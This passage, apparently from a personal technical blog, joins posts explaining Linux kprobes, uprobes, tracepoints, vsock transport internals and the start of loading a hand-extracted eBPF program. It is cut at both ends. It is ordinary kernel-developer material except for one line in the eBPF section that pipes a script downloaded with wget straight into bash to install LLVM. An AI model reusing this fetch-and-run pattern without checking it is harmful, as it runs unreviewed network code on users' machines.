pr_err("register_kprobe failed, returned %d\n", ret);
return ret;
}
pr_info("Planted kprobe at %p\n", kp.addr);
return 0;
}
static void __exit kprobe_exit(void)
{
unregister_kprobe(&kp);
pr_info("kprobe at %p unregistered\n", kp.addr);
}
module_init(kprobe_init)
module_exit(kprobe_exit)
MODULE_LICENSE("GPL");
</code></pre></div></div>
<p>After building and loading it with insmod, dmesg will show the handler messages.</p>
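<p>A minimal out-of-tree build sketch, assuming the source above is saved as kprobe_example.c and the headers for the running kernel are installed (the file names and paths are my own choices):</p>

```shell
# Write a minimal out-of-tree module Makefile (recipe lines need a tab).
printf 'obj-m := kprobe_example.o\n\ndefault:\n\t$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules\n' > Makefile

make                           # builds kprobe_example.ko
sudo insmod kprobe_example.ko  # plants the kprobe on _do_fork
dmesg | tail                   # pre/post handler output appears on each fork
sudo rmmod kprobe_example      # removes the probe
```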
<h4> kprobe anatomy </h4>
<p>The work flow of kprobe is as following:</p>
<ul>
<li>
<p>register_kprobe() registers a probe address (mostly a function). prepare_kprobe()->arch_prepare_kprobe() (on x86) copies the instruction at the probe address and stores it; arm_kprobe()->arch_arm_kprobe() (on x86) replaces the instruction at the probe address with ‘BREAKPOINT_INSTRUCTION’ (the int3 breakpoint). The kprobe is inserted into the ‘kprobe_table’ hash list.</p>
</li>
<li>
<p>When the probe address is executed, do_int3() is called to handle the exception. It calls kprobe_int3_handler(), which calls get_kprobe() to find the kprobe in the ‘kprobe_table’ hash list, and then calls the pre_handler of the registered kprobe. kprobe_int3_handler() then calls ‘setup_singlestep’ to set up single-step execution of the stored probed instruction. It returns, and when the int3 handler is over, the original probed instruction gets executed.</p>
</li>
<li>
<p>After the original probed instruction completes, it triggers a single-step exception, which is handled by ‘kprobe_debug_handler’. In this function, the post_handler of the registered kprobe is executed.</p>
</li>
</ul>
<p>kretprobe is almost the same as kprobe: register_kretprobe() calls register_kprobe() to register a kprobe with the pre_handler ‘pre_handler_kretprobe’, which replaces the normal return address with the ‘kretprobe_trampoline’ address.</p>
<h3> uprobe </h3>
<h4> uprobe usage </h4>
<p>Prepare a tiny C program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
#include <stdlib.h>
void f()
{
printf("f() called\n");
}
int main()
{
f();
return 0;
}
</code></pre></div></div>
<p>Using objdump -S, find f()’s offset in the ELF file; it’s 0x64d here.
Set up the uprobe as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/uprobe# echo 'p /home/test/uprobe/test:0x64d' >> /sys/kernel/debug/tracing/uprobe_events
root@ubuntu:~/uprobe# echo 1 > /sys/kernel/debug/tracing/events/uprobes/p_test_0x64d/enable
root@ubuntu:~/uprobe# echo 1 > /sys/kernel/debug/tracing/tracing_on
root@ubuntu:~/uprobe# ./test
f() called
root@ubuntu:~/uprobe# ./test
f() called
root@ubuntu:~/uprobe# echo 0 > /sys/kernel/debug/tracing/tracing_on
root@ubuntu:~/uprobe# cat /sys/kernel/debug/tracing/trace
# tracer: nop
#
# entries-in-buffer/entries-written: 2/2 #P:8
#
# _-----=> irqs-off
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / delay
# TASK-PID CPU# |||| TIMESTAMP FUNCTION
# | | | |||| | |
test-17489 [005] d... 128037.287391: p_test_0x64d: (0x55f38badc64d)
test-17490 [004] d... 128038.998229: p_test_0x64d: (0x55c76884e64d)
</code></pre></div></div>
<h4> uprobe anatomy </h4>
<p>uprobe exports no separate interface except through debugfs/tracefs. The following steps show how uprobe works.</p>
<ul>
<li>
<p>Write a uprobe event to ‘uprobe_events’: probes_write()->create_trace_uprobe(). The latter calls kern_path() to open the ELF file and get its inode, then calls alloc_trace_uprobe() to allocate a trace_uprobe struct; the inode and offset are stored in this struct. It then calls register_trace_uprobe() to register the trace_uprobe. register_trace_uprobe() calls ‘register_uprobe_event’ and inserts the trace_uprobe into probe_list. register_uprobe_event() initializes the ‘trace_uprobe’ struct’s ‘trace_event_call’ member and calls trace_add_event_call(). trace_add_event_call() calls __register_event() and __add_event_to_tracers(); the latter creates a directory and some files (enable, id, ...) in ‘/sys/kernel/debug/tracing/events/uprobes’. Anyway, when writing to ‘uprobe_events’ we just set up the structures in the trace framework.</p>
</li>
<li>
<p>When writing to ‘/sys/kernel/debug/tracing/events/uprobes/p_test_0x64d/enable’, trace_uprobe_register()->probe_event_enable()->uprobe_register() runs. uprobe_register() calls alloc_uprobe() to allocate a ‘struct uprobe’, in which the inode and offset are stored, and calls insert_uprobe() to insert this ‘uprobe’ into the ‘uprobes_tree’ rb-tree. Then register_for_each_vma() is called to insert the breakpoint (0xcc) into the virtual memory of currently running processes.</p>
</li>
<li>
<p>When the ELF file that has a uprobe gets executed, its text is mmapped into the process address space and uprobe_mmap() is called. In this function, build_probe_list() finds all of the uprobe points and changes the instruction at each probed virtual address to 0xcc.</p>
</li>
<li>
<p>When the program execution arrives at the 0xcc, it triggers an int3 exception. In do_int3(), notify_die(DIE_INT3) is called, which invokes the callbacks registered in ‘die_chain’. In the uprobe initialization function init_uprobes(), ‘uprobe_exception_nb’ is registered, so arch_uprobe_exception_notify() is called. uprobe_pre_sstep_notifier() then sets the thread flag TIF_UPROBE. Before returning to userspace, exit_to_usermode_loop()->uprobe_notify_resume()->handle_swbp() runs; handle_swbp() calls the handlers (handler_chain) and puts the thread into single-step mode (pre_ssout).</p>
</li>
<li>
<p>After executing the original instruction, the program triggers a single-step exception. In do_debug(), notify_die(DIE_DEBUG) is called, and handle_singlestep() finishes the job.</p>
</li>
</ul>
<h3> tracepoint </h3>
<h4> tracepoint anatomy </h4>
<p>Older kernel versions have a standalone example of a pure tracepoint; for example, v3.8 has one in the samples/tracepoints directory. Of course it can’t work on current kernels, because nowadays tracepoints are tied more closely to the tracer (ftrace), and together they are called ‘trace events’, which I will talk about in the next post.</p>
<p>‘DECLARE_TRACE’ and ‘DEFINE_TRACE’ are the key macros of tracepoints.</p>
<p>‘DECLARE_TRACE’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define DECLARE_TRACE(name, proto, args) \
__DECLARE_TRACE(name, PARAMS(proto), PARAMS(args), \
cpu_online(raw_smp_processor_id()), \
PARAMS(void *__data, proto), \
PARAMS(__data, args))
#define __DECLARE_TRACE(name, proto, args, cond, data_proto, data_args) \
extern struct tracepoint __tracepoint_##name; \
static inline void trace_##name(proto) \
{ \
if (static_key_false(&__tracepoint_##name.key)) \
__DO_TRACE(&__tracepoint_##name, \
TP_PROTO(data_proto), \
TP_ARGS(data_args), \
TP_CONDITION(cond), 0); \
if (IS_ENABLED(CONFIG_LOCKDEP) && (cond)) { \
rcu_read_lock_sched_notrace(); \
rcu_dereference_sched(__tracepoint_##name.funcs);\
rcu_read_unlock_sched_notrace(); \
} \
} \
__DECLARE_TRACE_RCU(name, PARAMS(proto), PARAMS(args), \
PARAMS(cond), PARAMS(data_proto), PARAMS(data_args)) \
static inline int \
register_trace_##name(void (*probe)(data_proto), void *data) \
{ \
return tracepoint_probe_register(&__tracepoint_##name, \
(void *)probe, data); \
} \
static inline int \
register_trace_prio_##name(void (*probe)(data_proto), void *data,\
int prio) \
{ \
return tracepoint_probe_register_prio(&__tracepoint_##name, \
(void *)probe, data, prio); \
} \
static inline int \
unregister_trace_##name(void (*probe)(data_proto), void *data) \
{ \
return tracepoint_probe_unregister(&__tracepoint_##name,\
(void *)probe, data); \
} \
static inline void \
check_trace_callback_type_##name(void (*cb)(data_proto)) \
{ \
} \
static inline bool \
trace_##name##_enabled(void) \
{ \
return static_key_false(&__tracepoint_##name.key); \
}
</code></pre></div></div>
<p>A tracepoint is represented by a ‘struct tracepoint’; the</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 'extern struct tracepoint __tracepoint_##name'
</code></pre></div></div>
<p>means there will be a ‘tracepoint’ definition somewhere. It is in fact defined by the ‘DEFINE_TRACE’ macro.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct tracepoint {
const char *name; /* Tracepoint name */
struct static_key key;
int (*regfunc)(void);
void (*unregfunc)(void);
struct tracepoint_func __rcu *funcs;
};
</code></pre></div></div>
<p>‘key’ is used to determine whether the tracepoint is enabled. ‘funcs’ is the array of probe functions this tracepoint will call.
‘regfunc’ is a callback invoked before a probe function is added to the tracepoint.</p>
<p>Here we also see the definition of the ‘trace_##name’ function, which is what we call in our code.</p>
<p>The ‘register_trace_##name’ function calls ‘tracepoint_probe_register’ to attach our probe function to the tracepoint. ‘tracepoint_add_func’ does the real work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int tracepoint_add_func(struct tracepoint *tp,
struct tracepoint_func *func, int prio)
{
struct tracepoint_func *old, *tp_funcs;
int ret;
if (tp->regfunc && !static_key_enabled(&tp->key)) {
ret = tp->regfunc();
if (ret < 0)
return ret;
}
tp_funcs = rcu_dereference_protected(tp->funcs,
lockdep_is_held(&tracepoints_mutex));
old = func_add(&tp_funcs, func, prio);
if (IS_ERR(old)) {
WARN_ON_ONCE(1);
return PTR_ERR(old);
}
/*
* rcu_assign_pointer has a smp_wmb() which makes sure that the new
* probe callbacks array is consistent before setting a pointer to it.
* This array is referenced by __DO_TRACE from
* include/linux/tracepoints.h. A matching smp_read_barrier_depends()
* is used.
*/
rcu_assign_pointer(tp->funcs, tp_funcs);
if (!static_key_enabled(&tp->key))
static_key_slow_inc(&tp->key);
release_probes(old);
return 0;
}
</code></pre></div></div>
<p>As we can see, it just adds ‘func’ to ‘tp->funcs’; the array is kept ordered by ‘prio’ (in func_add).</p>
<p>Now let’s look at the ‘DEFINE_TRACE’ macro.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define DEFINE_TRACE_FN(name, reg, unreg) \
static const char __tpstrtab_##name[] \
__attribute__((section("__tracepoints_strings"))) = #name; \
struct tracepoint __tracepoint_##name \
__attribute__((section("__tracepoints"))) = \
{ __tpstrtab_##name, STATIC_KEY_INIT_FALSE, reg, unreg, NULL };\
static struct tracepoint * const __tracepoint_ptr_##name __used \
__attribute__((section("__tracepoints_ptrs"))) = \
&__tracepoint_##name;
#define DEFINE_TRACE(name) \
DEFINE_TRACE_FN(name, NULL, NULL);
</code></pre></div></div>
<p>So here the ‘struct tracepoint’ is defined and placed in the ‘__tracepoints’ section.</p>
<p>Now that we know how the ‘struct tracepoint’ is created, let’s see what happens when we call ‘trace_##name’. It will
call __DO_TRACE.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline void trace_##name(proto) \
{ \
if (static_key_false(&__tracepoint_##name.key)) \
__DO_TRACE(&__tracepoint_##name, \
TP_PROTO(data_proto), \
TP_ARGS(data_args), \
TP_CONDITION(cond), 0); \
if (IS_ENABLED(CONFIG_LOCKDEP) && (cond)) { \
rcu_read_lock_sched_notrace(); \
rcu_dereference_sched(__tracepoint_##name.funcs);\
rcu_read_unlock_sched_notrace(); \
} \
}
#define __DO_TRACE(tp, proto, args, cond, rcucheck) \
do { \
struct tracepoint_func *it_func_ptr; \
void *it_func; \
void *__data; \
\
if (!(cond)) \
return; \
if (rcucheck) { \
if (WARN_ON_ONCE(rcu_irq_enter_disabled())) \
return; \
rcu_irq_enter_irqson(); \
} \
rcu_read_lock_sched_notrace(); \
it_func_ptr = rcu_dereference_sched((tp)->funcs); \
if (it_func_ptr) { \
do { \
it_func = (it_func_ptr)->func; \
__data = (it_func_ptr)->data; \
((void(*)(proto))(it_func))(args); \
} while ((++it_func_ptr)->func); \
} \
rcu_read_unlock_sched_notrace(); \
if (rcucheck) \
rcu_irq_exit_irqson(); \
} while (0)
</code></pre></div></div>
<p>It will call the functions in ‘tp->funcs’ array.</p>
<p>So now we have the tracepoint framework; the only remaining step is to add a function to ‘tp->funcs’. Such a function is called a ‘probe’. In the old days we could do this from another kernel module, but nowadays the tracepoint is tied to ftrace, and the combination is called a ‘trace event’.</p>
<p>The next post will talk about how ‘trace event’ works.</p>
Linux vsock internals2020-04-18T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/04/18/vsock-internals
<h3> Background </h3>
<p>VM Sockets(vsock) is a fast and efficient communication mechanism between guest virtual machines and their host. It was added by VMware in commit <a href="https://github.com/torvalds/linux/commit/d021c344051af91f42c5ba9fdedc176740cbd238">VSOCK: Introduce VM Sockets</a>. The commit added a new socket address family named vsock and its vmci transport.</p>
<p>VM Sockets can be used in many situations, for example by the VMware Tools inside the guest. As vsock is very useful, the community has developed vsock support for other hypervisors such as qemu/kvm and Hyper-V.
Red Hat added the virtio transport for the guest in commit <a href="https://github.com/torvalds/linux/commit/0ea9e1d3a9e3ef7d2a1462d3de6b95131dc7d872">VSOCK: Introduce virtio_transport.ko</a>, and the vhost transport for the host was added in commit <a href="https://github.com/torvalds/linux/commit/433fc58e6bf2c8bd97e57153ed28e64fd78207b8">VSOCK: Introduce vhost_vsock.ko</a>. Microsoft added the Hyper-V transport in commit <a href="https://github.com/torvalds/linux/commit/ae0078fcf0a5eb3a8623bfb5f988262e0911fdb9">hv_sock: implements Hyper-V transport for Virtual Sockets (AF_VSOCK)</a>; of course, the host side of this transport lives in the Windows kernel and is not open source.</p>
<p>This post will focus on the virtio transport in the guest and the vhost transport in the host.</p>
<h3> Architecture </h3>
<p>The following picture is from Stefano Garzarella’s <a href="https://static.sched.com/hosted_files/devconfcz2020a/b1/DevConf.CZ_2020_vsock_v1.1.pdf">slides</a>.</p>
<p><img src="/assets/img/vsock/1.png" alt="" /></p>
<p>There are several layers here.</p>
<ul>
<li>application, uses &lt;cid, port&gt; as a socket address</li>
<li>socket layer, support for socket API</li>
<li>AF_VSOCK address family, implement the vsock core</li>
<li>transport, transports the data between guest and host.</li>
</ul>
<p>The transport layer is the one most worth discussing, as the other three just implement standard kernel interfaces.</p>
<p>The transport, as its name indicates, is used to carry data between guest and host, just as a network card transports data between local and remote sockets. There are two kinds of transports, according to the direction of data flow.</p>
<ul>
<li>G2H: guest->host transports. They run in the guest; the guest vsock networking protocol uses them to communicate with the host.</li>
<li>H2G: host->guest transports. They run in the host; the host vsock networking protocol uses them to communicate with the guest.</li>
</ul>
<p>Usually the H2G transport is implemented as an emulated device, and the G2H transport is implemented as that device’s driver. For example, in VMware the H2G transport is an emulated vmci PCI device and the G2H transport is the vmci device driver. In qemu the H2G transport is an emulated vhost-vsock device and the G2H transport is the vsock device’s driver.</p>
<p>The following picture shows the virtio (guest) and vhost (host) transports. It is also from Stefano Garzarella’s slides.</p>
<p><img src="/assets/img/vsock/2.png" alt="" /></p>
<p>The vsock address family and the G2H transports are implemented in the ‘net/vmw_vsock’ directory of the Linux tree.
The H2G transports are implemented under ‘drivers’: vhost vsock is in ‘drivers/vhost/vsock.c’ and vmci is in the ‘drivers/misc/vmw_vmci’ directory.</p>
<p>The following picture shows the virtio&lt;-&gt;vhost transport in qemu in more detail.</p>
<p><img src="/assets/img/vsock/3.png" alt="" /></p>
<p>The following are the steps the guest and host take to initialize their transport channel.</p>
<ol>
<li>When starting qemu, add ‘-device vhost-vsock-pci,guest-cid=&lt;CID&gt;’ to the qemu command line.</li>
<li>Load the vhost_vsock driver in the host.</li>
<li>The guest kernel probes the vhost-vsock pci device and loads its driver. This virtio driver is registered in the ‘virtio_vsock_init’ function.</li>
<li>The virtio_vsock driver initializes the emulated vhost-vsock device and from then on communicates with the vhost_vsock driver.</li>
</ol>
<p>The transport layer has a global variable named ‘transport’. Both the guest and host sides register their vsock transport by calling ‘vsock_core_init’, which sets ‘transport’ to a transport implementation.</p>
<p>For example the guest kernel function ‘virtio_vsock_init’ calls ‘vsock_core_init’ to set the ‘transport’ to ‘virtio_transport.transport’ and the host kernel function ‘vhost_vsock_init’ calls ‘vsock_core_init’ to set the ‘transport’ to ‘vhost_transport.transport’.</p>
<p>After initialization, the guest and host can use vsock to talk to each other.</p>
<h3> send/recv data</h3>
<p>vsock has two socket types, just like udp and tcp for ipv4. The following shows ‘vsock_stream_ops’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static const struct proto_ops vsock_stream_ops = {
.family = PF_VSOCK,
.owner = THIS_MODULE,
.release = vsock_release,
.bind = vsock_bind,
.connect = vsock_stream_connect,
.socketpair = sock_no_socketpair,
.accept = vsock_accept,
.getname = vsock_getname,
.poll = vsock_poll,
.ioctl = sock_no_ioctl,
.listen = vsock_listen,
.shutdown = vsock_shutdown,
.setsockopt = vsock_stream_setsockopt,
.getsockopt = vsock_stream_getsockopt,
.sendmsg = vsock_stream_sendmsg,
.recvmsg = vsock_stream_recvmsg,
.mmap = sock_no_mmap,
.sendpage = sock_no_sendpage,
};
</code></pre></div></div>
<p>Most of vsock’s ‘proto_ops’ are easy to understand. Here I just use the send/recv path to show how the transport layer moves data between guest and host.</p>
<h4> guest send </h4>
<p>‘vsock_stream_sendmsg’ is used to send data to the host. It calls the transport’s ‘stream_enqueue’ callback, which in the guest is ‘virtio_transport_stream_enqueue’. That function creates a ‘virtio_vsock_pkt_info’ and calls ‘virtio_transport_send_pkt_info’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ssize_t
virtio_transport_stream_enqueue(struct vsock_sock *vsk,
struct msghdr *msg,
size_t len)
{
struct virtio_vsock_pkt_info info = {
.op = VIRTIO_VSOCK_OP_RW,
.type = VIRTIO_VSOCK_TYPE_STREAM,
.msg = msg,
.pkt_len = len,
.vsk = vsk,
};
return virtio_transport_send_pkt_info(vsk, &info);
}
virtio_transport_send_pkt_info
-->virtio_transport_alloc_pkt
-->virtio_transport_get_ops()->send_pkt(pkt);(virtio_transport_send_pkt)
</code></pre></div></div>
<p>‘virtio_transport_alloc_pkt’ allocates a buffer (‘pkt->buf’) to hold the data being sent.
‘virtio_transport_send_pkt’ inserts the ‘virtio_vsock_pkt’ into a list and schedules a work item.
The actual transmission happens in the ‘virtio_transport_send_pkt_work’ function.</p>
<p>‘virtio_transport_send_pkt_work’ performs the virtio driver’s standard operations: prepare a scatterlist holding the packet header and the payload, call ‘virtqueue_add_sgs’, then call ‘virtqueue_kick’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void
virtio_transport_send_pkt_work(struct work_struct *work)
{
struct virtio_vsock *vsock =
container_of(work, struct virtio_vsock, send_pkt_work);
struct virtqueue *vq;
bool added = false;
bool restart_rx = false;
mutex_lock(&vsock->tx_lock);
...
vq = vsock->vqs[VSOCK_VQ_TX];
for (;;) {
struct virtio_vsock_pkt *pkt;
struct scatterlist hdr, buf, *sgs[2];
int ret, in_sg = 0, out_sg = 0;
bool reply;
...
pkt = list_first_entry(&vsock->send_pkt_list,
struct virtio_vsock_pkt, list);
list_del_init(&pkt->list);
spin_unlock_bh(&vsock->send_pkt_list_lock);
virtio_transport_deliver_tap_pkt(pkt);
reply = pkt->reply;
sg_init_one(&hdr, &pkt->hdr, sizeof(pkt->hdr));
sgs[out_sg++] = &hdr;
if (pkt->buf) {
sg_init_one(&buf, pkt->buf, pkt->len);
sgs[out_sg++] = &buf;
}
ret = virtqueue_add_sgs(vq, sgs, out_sg, in_sg, pkt, GFP_KERNEL);
/* Usually this means that there is no more space available in
* the vq
*/
...
added = true;
}
if (added)
virtqueue_kick(vq);
...
}
</code></pre></div></div>
<h4> host recv </h4>
<p>The host side’s handler for the tx queue kick is ‘vhost_vsock_handle_tx_kick’; it is installed in the ‘vhost_vsock_dev_open’ function.</p>
<p>‘vhost_vsock_handle_tx_kick’ also performs the standard virtio backend operations: it pops the vring descriptors, calls ‘vhost_vsock_alloc_pkt’ to reconstruct a ‘virtio_vsock_pkt’, then calls ‘virtio_transport_recv_pkt’ to deliver the packet to its destination.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void vhost_vsock_handle_tx_kick(struct vhost_work *work)
{
struct vhost_virtqueue *vq = container_of(work, struct vhost_virtqueue,
poll.work);
struct vhost_vsock *vsock = container_of(vq->dev, struct vhost_vsock,
dev);
struct virtio_vsock_pkt *pkt;
int head, pkts = 0, total_len = 0;
unsigned int out, in;
bool added = false;
mutex_lock(&vq->mutex);
...
vhost_disable_notify(&vsock->dev, vq);
do {
u32 len;
...
head = vhost_get_vq_desc(vq, vq->iov, ARRAY_SIZE(vq->iov),
&out, &in, NULL, NULL);
...
pkt = vhost_vsock_alloc_pkt(vq, out, in);
...
len = pkt->len;
/* Deliver to monitoring devices all received packets */
virtio_transport_deliver_tap_pkt(pkt);
/* Only accept correctly addressed packets */
if (le64_to_cpu(pkt->hdr.src_cid) == vsock->guest_cid)
virtio_transport_recv_pkt(pkt);
else
virtio_transport_free_pkt(pkt);
len += sizeof(pkt->hdr);
vhost_add_used(vq, head, len);
total_len += len;
added = true;
} while(likely(!vhost_exceeds_weight(vq, ++pkts, total_len)));
...
}
</code></pre></div></div>
<p>‘virtio_transport_recv_pkt’ is the function that actually delivers the message data. It calls ‘vsock_find_connected_socket’ to find the destination socket, then calls a specific handler according to that socket’s state. For ‘TCP_ESTABLISHED’ it calls ‘virtio_transport_recv_connected’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void virtio_transport_recv_pkt(struct virtio_vsock_pkt *pkt)
{
struct sockaddr_vm src, dst;
struct vsock_sock *vsk;
struct sock *sk;
bool space_available;
vsock_addr_init(&src, le64_to_cpu(pkt->hdr.src_cid),
le32_to_cpu(pkt->hdr.src_port));
vsock_addr_init(&dst, le64_to_cpu(pkt->hdr.dst_cid),
le32_to_cpu(pkt->hdr.dst_port));
...
/* The socket must be in connected or bound table
* otherwise send reset back
*/
sk = vsock_find_connected_socket(&src, &dst);
...
vsk = vsock_sk(sk);
...
switch (sk->sk_state) {
case TCP_LISTEN:
virtio_transport_recv_listen(sk, pkt);
virtio_transport_free_pkt(pkt);
break;
case TCP_SYN_SENT:
virtio_transport_recv_connecting(sk, pkt);
virtio_transport_free_pkt(pkt);
break;
case TCP_ESTABLISHED:
virtio_transport_recv_connected(sk, pkt);
break;
case TCP_CLOSING:
virtio_transport_recv_disconnecting(sk, pkt);
virtio_transport_free_pkt(pkt);
break;
default:
virtio_transport_free_pkt(pkt);
break;
}
release_sock(sk);
/* Release refcnt obtained when we fetched this socket out of the
* bound or connected list.
*/
sock_put(sk);
return;
free_pkt:
virtio_transport_free_pkt(pkt);
}
</code></pre></div></div>
<p>For data packets ‘pkt->hdr.op’ is ‘VIRTIO_VSOCK_OP_RW’, so ‘virtio_transport_recv_enqueue’ is called; it adds the packet to the destination socket’s ‘rx_queue’.</p>
<p>So when the host (or another VM) calls recv, ‘vsock_stream_recvmsg’ is invoked and the transport layer’s ‘stream_dequeue’ callback (‘virtio_transport_stream_do_dequeue’) runs. It pops entries from ‘rx_queue’, copies them into the msghdr, and returns the data to the userspace application.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static ssize_t
virtio_transport_stream_do_dequeue(struct vsock_sock *vsk,
struct msghdr *msg,
size_t len)
{
struct virtio_vsock_sock *vvs = vsk->trans;
struct virtio_vsock_pkt *pkt;
size_t bytes, total = 0;
u32 free_space;
int err = -EFAULT;
spin_lock_bh(&vvs->rx_lock);
while (total < len && !list_empty(&vvs->rx_queue)) {
pkt = list_first_entry(&vvs->rx_queue,
struct virtio_vsock_pkt, list);
bytes = len - total;
if (bytes > pkt->len - pkt->off)
bytes = pkt->len - pkt->off;
/* sk_lock is held by caller so no one else can dequeue.
* Unlock rx_lock since memcpy_to_msg() may sleep.
*/
spin_unlock_bh(&vvs->rx_lock);
err = memcpy_to_msg(msg, pkt->buf + pkt->off, bytes);
if (err)
goto out;
spin_lock_bh(&vvs->rx_lock);
total += bytes;
pkt->off += bytes;
if (pkt->off == pkt->len) {
virtio_transport_dec_rx_pkt(vvs, pkt);
list_del(&pkt->list);
virtio_transport_free_pkt(pkt);
}
}
...
return total;
...
}
</code></pre></div></div>
<h3> multi-transport </h3>
<p>As we saw above, one kernel (host or guest) can register only one transport. This is problematic in nested virtualization. For example, consider an L0 VMware VM that itself runs an L1 qemu/kvm VM. The L0 VM can register only one transport: if it registers the ‘vmci’ transport it can only talk to the VMware vmci device, and if it registers ‘vhost_vsock’ it can only talk to the L1 VM.
Fortunately Stefano Garzarella has addressed this issue in commit <a href="https://github.com/torvalds/linux/commit/c0cfa2d8a788fcf45df5bf4070ab2474c88d543a">vsock: add multi-transports support</a>. Readers who are interested can learn more there.</p>
<h3> Reference </h3>
<ol>
<li><a href="https://vmsplice.net/~stefan/stefanha-kvm-forum-2015.pdf">virtio-vsock Zero-configuration host/guest communication</a>, Stefan Hajnoczi, KVM Forum 2015</li>
<li><a href="https://static.sched.com/hosted_files/devconfcz2020a/b1/DevConf.CZ_2020_vsock_v1.1.pdf">VSOCK: VM↔host socket with minimal configuration</a>, Stefano Garzarella, DevConf.CZ 2020</li>
<li><a href="https://stefano-garzarella.github.io/posts/2020-02-20-vsock-nested-vms-loopback/">AF_VSOCK: nested VMs and loopback support available</a></li>
</ol>
Write eBPF program in pure C2020-01-18T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/01/18/ebpf-in-c
<p>While developing a new eBPF program type, we need to do some small tests. We do not want to touch much of libbpf or the higher-level bcc; all we need is an eBPF program and a way to load it into the kernel. This post shows how to do that: I will attach an eBPF program to a kprobe. It takes three parts: prepare the eBPF program, write a loader for it, and expose the kernel function through a kprobe.</p>
<h3> Prepare a eBPF program </h3>
<p>On Debian 9.1 we install a custom kernel (4.9.208). Go to samples/bpf and run make (clang and llvm need to be installed first).</p>
<p>Add a test_bpf.c in samples/bpf directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <uapi/linux/bpf.h>
#include "bpf_helpers.h"
int bpf_prog(void *ctx) {
char buf[] = "Hello World!\n";
bpf_trace_printk(buf, sizeof(buf));
return 0;
}
</code></pre></div></div>
<p>Add one line in samples/bpf/Makefile right place.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> always += test_bpf.o
</code></pre></div></div>
<p>Then type ‘make’ to compile this bpf program.</p>
<p>Now we get a ‘test_bpf.o’ file. But it contains a lot of ELF file metadata. We need to extract the eBPF program itself out.</p>
<p>First let’s see what the eBPF code is. The first try shows that Debian’s built-in llvm tools are too old; they don’t support the ‘-S’ option.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# llvm-objdump -arch-name=bpf -S test_bpf.o
llvm-objdump: Unknown command line argument '-S'. Try: 'llvm-objdump -help'
llvm-objdump: Did you mean '-D'?
</code></pre></div></div>
<p>Go to ‘http://apt.llvm.org/’ and install the new clang and llvm.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bash -c "$(wget -O - https://apt.llvm.org/llvm.sh)"
</code></pre></div></div>
<p>Use the new tool to see the eBPF program.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# llvm-objdump-9 -arch-name=bpf -S test_bpf.o
test_bpf.o: file format ELF64-unknown
Disassembly of section .text:
0000000000000000 bpf_prog:
0: b7 01 00 00 0a 00 00 00 r1 = 10
1: 6b 1a fc ff 00 00 00 00 *(u16 *)(r10 - 4) = r1
2: b7 01 00 00 72 6c 64 21 r1 = 560229490
3: 63 1a f8 ff 00 00 00 00 *(u32 *)(r10 - 8) = r1
4: 18 01 00 00 48 65 6c 6c 00 00 00 00 6f 20 57 6f r1 = 8022916924116329800 ll
6: 7b 1a f0 ff 00 00 00 00 *(u64 *)(r10 - 16) = r1
7: bf a1 00 00 00 00 00 00 r1 = r10
8: 07 01 00 00 f0 ff ff ff r1 += -16
9: b7 02 00 00 0e 00 00 00 r2 = 14
10: 85 00 00 00 06 00 00 00 call 6
11: b7 00 00 00 00 00 00 00 r0 = 0
12: 95 00 00 00 00 00 00 00 exit
root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf#
</code></pre></div></div>
<p>As we can see, the eBPF code is contained in the .text section of ‘test_bpf.o’; its size is 13*8=104 bytes.</p>
<p>Use dd to dump the eBPF code (the .text section starts at offset 64).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# dd if=./test_bpf.o of=test_bpf bs=1 count=104 skip=64
104+0 records in
104+0 records out
104 bytes copied, 0.000221178 s, 470 kB/s
root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# hexdump test_bpf
0000000 01b7 0000 000a 0000 1a6b fffc 0000 0000
0000010 01b7 0000 6c72 2164 1a63 fff8 0000 0000
0000020 0118 0000 6548 6c6c 0000 0000 206f 6f57
0000030 1a7b fff0 0000 0000 a1bf 0000 0000 0000
0000040 0107 0000 fff0 ffff 02b7 0000 000e 0000
0000050 0085 0000 0006 0000 00b7 0000 0000 0000
0000060 0095 0000 0000 0000
0000068
</code></pre></div></div>
<p>OK, now we have the file ‘test_bpf’, which contains the raw instructions of our ‘Hello World’ eBPF program.</p>
<h3> Open the perf event kprobe </h3>
<p>Create the kprobe and get its event id:</p>
